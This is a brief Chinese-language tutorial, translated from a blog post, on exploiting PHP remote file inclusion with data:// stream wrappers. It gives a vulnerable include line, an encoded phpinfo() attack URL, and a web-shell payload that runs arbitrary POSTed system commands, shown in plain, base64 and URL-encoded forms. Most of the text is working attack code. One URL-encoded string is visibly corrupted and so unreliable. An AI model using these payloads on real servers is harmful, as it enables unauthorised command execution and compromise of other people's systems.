PHP RFI

原文地址：
https://www.idontplaydarts.com/2011/03/php-remote-file-inclusion-command-shell-using-data-stream/

PHP5.2及后续版本支持流封装。流封装的基本原理是通过另一个协议或服务写一个接口，然后可以使用你需要的函数获得数据。
例如

$session=ssh2_connect('example.com',22);
$stream=fopen("ssh2.tunnel://$session/remote.example.com:1234",'r');

另一个使用data://流是解码base64字符串:

echo file_get_contents('data://text/plain;base64,SSBsb3ZlIFBIUAo=');

流可以用于file_get_contents，fopen，include和require等。

5.2版本之后，如果allow_url_include开启了，我们可以使用数据流来包含可执行的PHP代码。例如：

<? include($_GET['file'] . ".php");

通过把一个字符串使用base64编码，然后使用url编码该字符串中的特殊字符，我们可以成功执行脚本。如下我们可以使用上面的脚本执行phpinfo来获得环境变量

<? phpinfo(); die();?>

:::php
// Base64 Encoded
PD8gcGhwaW5mbygpOyBkaWUoKTs/Pg==

// URL + Base64 Encoded
PD8gcGhwaW5mbygpOyBkaWUoKTs%2fPg==

// Final URL
index.php?file=data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs%2fPg==

上面的die语句用来阻止执行脚本的剩余部分或追加在数据流后面的不正确解码的".php"字符串。
除此以外，还可以执行shell命令，如下
PHP Payload:

<form action="<?=$_SERVER['REQUEST_URI']?>" method="POST"><input type="text" name="x" value="<?=htmlentities($_POST['x'])?>"><input type="submit" value="cmd"></form><pre><? echo `{$_POST['x']}`; ?></pre><? die(); ?>

Base64编码后的payload

PGZvcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8+IiBtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4IiB2YWx1ZT0iPD89aHRtbGVudGl0aWVzKCRfUE9TVFsneCddKT8+Ij48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0+PHByZT48PyAKZWNobyBgeyRfUE9TVFsneCddfWA7ID8+PC9wcmU+PD8gZGllKCk7ID8+Cgo=

Base64 + URL编码后的payload

PGZvcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2BIiBtZXRob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4IiB2YWx1ZT0iPD89aHRtbGVudGl0aWVzKCRfUE9TVFsneCddKT82BIj48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2BPHByZT48PyAKZWNobyBgeyRfUE9TVFsneCddfWA7ID8%2BPC9wcmU%2BPD8gZGllKCk7ID8%2BCgo%3D

运行php shell